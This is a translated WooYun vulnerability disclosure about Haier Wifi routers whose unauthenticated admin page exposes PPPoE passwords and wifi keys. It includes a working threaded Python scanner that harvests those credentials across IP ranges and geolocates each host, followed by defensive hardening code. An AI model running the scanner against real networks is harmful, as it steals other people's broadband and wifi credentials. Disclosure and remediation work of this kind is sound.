
Vulnerability summary

Vulnerability ID: wooyun-2015-0134297

Title: Haier Wifi unauthorized access directly leaks broadband credentials and wifi password (scanning script attached)

Vendor: 海尔集团 (Haier Group)

Author: 一只猿

Submitted: 2015-08-15 14:24

Fixed: 2015-10-03 17:42

Published: 2015-10-03 17:42

Type: Unauthorized access / privilege bypass

Severity: High

Self-assessed rank: 12

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-15: Details sent to the vendor, awaiting vendor handling
2015-08-19: Vendor confirmed; details visible to the vendor only
2015-08-29: Details disclosed to core white hats and domain experts
2015-09-08: Details disclosed to regular white hats
2015-09-18: Details disclosed to intern white hats
2015-10-03: Details disclosed to the public

Brief description:

Unauthorized access

Detailed description:

The Haier Wifi router management interface can be reached remotely without a password. With no further authentication, the page exposes the broadband (PPPoE) account name and password as well as the wifi SSID and key, so scanning a network range with a script is enough to harvest information from a portion of the deployed devices.

Proof of vulnerability:

I scanned a small number of ranges; this niche router is not widely deployed, but the risk is real. Several example screenshots follow.

[Seven screenshots omitted: 2015-08-15 13:06:37 through 13:07:42, showing example affected devices]


The scan results are shown below:

[Three screenshots omitted: 2015-08-15 13:09:48, 13:20:02 and 13:13:25, showing scan output]

The scanning script follows:

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-08-15 13:21
# Python 2 script: walks an IP range, fetches each host's root page on the
# given port, and prints the fields a "Haier Wifi" admin page exposes
# without authentication.
import Queue
from threading import Thread
import re
import json
import urllib2

# ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]

# num to ip
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
                            (num & 0x00ff0000) >> 16,
                            (num & 0x0000ff00) >> 8,
                            num & 0x000000ff)

# get all ips list between start ip and end ip (addresses ending in .0 are skipped)
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]

# main function: queue every host and run the requested number of worker threads
def bThread(iplist):
    SETTHREAD = raw_input('Thread: ')
    print '[Note] Running...\n'
    queue = Queue.Queue()
    for host in iplist:
        queue.put(host)
    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()

# get host position by Taobao API; returns None once the retries are used up
# (the original retried without returning the result, so the caller always got None)
def getposition(host, retries=3):
    try:
        ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip=" + host
        jsondata = urllib2.urlopen(ipurl, timeout=5).read()
        value = json.loads(jsondata)['data']
        return [value['country'], value['region'], value['city'], value['isp']]
    except Exception, e:
        print "[Note] Get " + host + " position failed , will retry ...\n"
        if retries > 0:
            return getposition(host, retries - 1)
        return None

# worker thread: pull hosts off the queue until it is empty
class tThread(Thread):
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        while not self.queue.empty():
            host = self.queue.get()
            try:
                checktitle(host, PORT)
            except Exception:
                continue

# fetch the root page; if the title is "Haier Wifi", pull the form values and
# JavaScript variables straight out of the unauthenticated HTML
def checktitle(host, port):
    aimurl = "http://" + host + ":" + port
    try:
        f = urllib2.urlopen(aimurl, timeout=5)
        htmlcontent = f.read()
        f.close()
        title = re.findall(r'<title>(.+?)</title>', htmlcontent)
        if title and title[0].encode('utf8') == "Haier Wifi":
            pppoeusername = re.findall(r'name="wan_pppoe_username" size="30" maxlength="128" value="(.+?)">', htmlcontent)
            pppoeupassword = re.findall(r'name="wan_pppoe_passwd" size="30" maxlength="128" value="(.+?)">', htmlcontent)
            ssid = re.findall(r'var ssid = \'(.+?)\'', htmlcontent)
            key = re.findall(r'var psk = \'(.+?)\'', htmlcontent)
            wanmac = re.findall(r'var factoryWanMac="(.+?)"', htmlcontent)
            posinfo = getposition(host)
            print "Found " + title[0].encode('utf8') + "\nurl: " + aimurl
            print "pppoeusername: " + pppoeusername[0].encode('utf8') + " pppoeupassword: " + pppoeupassword[0].encode('utf8')
            print "ssid: " + ssid[0] + " key: " + key[0].encode('utf8')
            print "factoryWanMac: " + wanmac[0].encode('utf8')
            # the geolocation lookup may have failed; only print it when it succeeded
            if posinfo:
                print " ".join(posinfo).encode('utf8') + "\n"
    except Exception, e:
        pass

if __name__ == '__main__':
    print '\nScan Haier Wifi Router program.\n'
    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')
    PORT = raw_input('Port: ')  # module-level; read by the worker threads
    iplist = ip_range(startIp, endIp)
    print '\n[Note] Will scan ' + str(len(iplist)) + " ips...\n"
    bThread(iplist)

Fix recommendation:

At the very least add a password or something; is running naked like this really OK?

Copyright notice: when reposting, credit the source 一只猿@乌云
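The report's two findings are that the admin page answers without any authentication and that, once fetched, it carries the PPPoE password and wifi PSK inline as form values and JavaScript variables. The following is an added example, not code from the report or from Haier, showing the weak page-rendering behaviour next to a hardened form: the configuration page is gated behind authentication, and even an authenticated page never echoes stored secrets back to the browser. The sample configuration, the admin credential, the `handle_request` / `leaks_secrets` helper names and the use of HTTP Basic auth are all constructed for the illustration.

```python
# Added example (not from the report or the vendor): weak admin-page rendering
# beside a hardened version. Sample config, admin credential and helper names
# are constructed for this illustration.
import base64
import binascii
import hmac
from html import escape
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample device state; a real device would read these from NVRAM.
CONFIG = {
    "wan_pppoe_username": "user@example-isp",
    "wan_pppoe_passwd": "pppoe-secret-123",
    "ssid": "Demo-Wifi",
    "psk": "wifi-secret-456",
}
ADMIN_USER = "admin"
ADMIN_PASS = "per-device-admin-pass"  # assumption: unique per unit, set at provisioning


def render_config_page_weak(cfg):
    """The behaviour the report describes: every stored secret is echoed into
    the HTML, so anyone who can fetch the page can read it."""
    return (
        "<html><head><title>Haier Wifi</title></head><body>"
        '<input name="wan_pppoe_username" size="30" maxlength="128" value="%s">'
        '<input name="wan_pppoe_passwd" size="30" maxlength="128" value="%s">'
        "<script>var ssid = '%s'; var psk = '%s';</script>"
        "</body></html>"
    ) % (cfg["wan_pppoe_username"], cfg["wan_pppoe_passwd"], cfg["ssid"], cfg["psk"])


def render_config_page_hardened(cfg):
    """Hardened form: secrets never leave the device. Password and PSK inputs
    are sent empty; the save handler treats an empty value as 'keep the stored
    value'. Non-secret values are HTML-escaped before being echoed."""
    return (
        "<html><head><title>Haier Wifi</title></head><body>"
        '<input name="wan_pppoe_username" size="30" maxlength="128" value="%s">'
        '<input name="wan_pppoe_passwd" type="password" size="30" maxlength="128" value="">'
        '<input name="ssid" size="30" maxlength="32" value="%s">'
        '<input name="psk" type="password" size="30" maxlength="63" value="">'
        "</body></html>"
    ) % (escape(cfg["wan_pppoe_username"], quote=True), escape(cfg["ssid"], quote=True))


def basic_auth_ok(header):
    """Validate an 'Authorization: Basic ...' header with constant-time compares."""
    if not header or not header.startswith("Basic "):
        return False
    try:
        decoded = base64.b64decode(header[6:], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return False
    user, sep, password = decoded.partition(":")
    if not sep:
        return False
    # '&' rather than 'and' so both comparisons always run.
    return hmac.compare_digest(user.encode(), ADMIN_USER.encode()) & \
        hmac.compare_digest(password.encode(), ADMIN_PASS.encode())


def make_basic_header(user, password):
    """Build the header a client would send (used by the self-test)."""
    return "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode()


def handle_request(auth_header, cfg):
    """Request logic as a pure function returning (status, body), so it can be
    exercised without opening a socket."""
    if not basic_auth_ok(auth_header):
        return 401, ""
    return 200, render_config_page_hardened(cfg)


def leaks_secrets(html, cfg):
    """Audit check: does a rendered page contain any stored secret verbatim?"""
    return any(s in html for s in (cfg["wan_pppoe_passwd"], cfg["psk"]))


class ConfigHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = handle_request(self.headers.get("Authorization"), CONFIG)
        data = body.encode("utf-8")
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    # Loopback only for the demonstration.
    HTTPServer(("127.0.0.1", 8080), ConfigHandler).serve_forever()
```

Run it and `curl -i http://127.0.0.1:8080/` returns 401 until a credential is supplied, and the 200 response never contains the PPPoE password or PSK, which `leaks_secrets` confirms against the weak rendering. Basic auth is used here only to keep the example short; on a real device the management interface should also sit behind TLS and not be reachable from the WAN side at all, which removes the scanning exposure the report demonstrates.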


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed at: 2015-08-19 17:40

Vendor reply:

Thank you to the WooYun platform white hats for the testing and the reminder; we have assigned staff to handle it.

Latest status:

None yet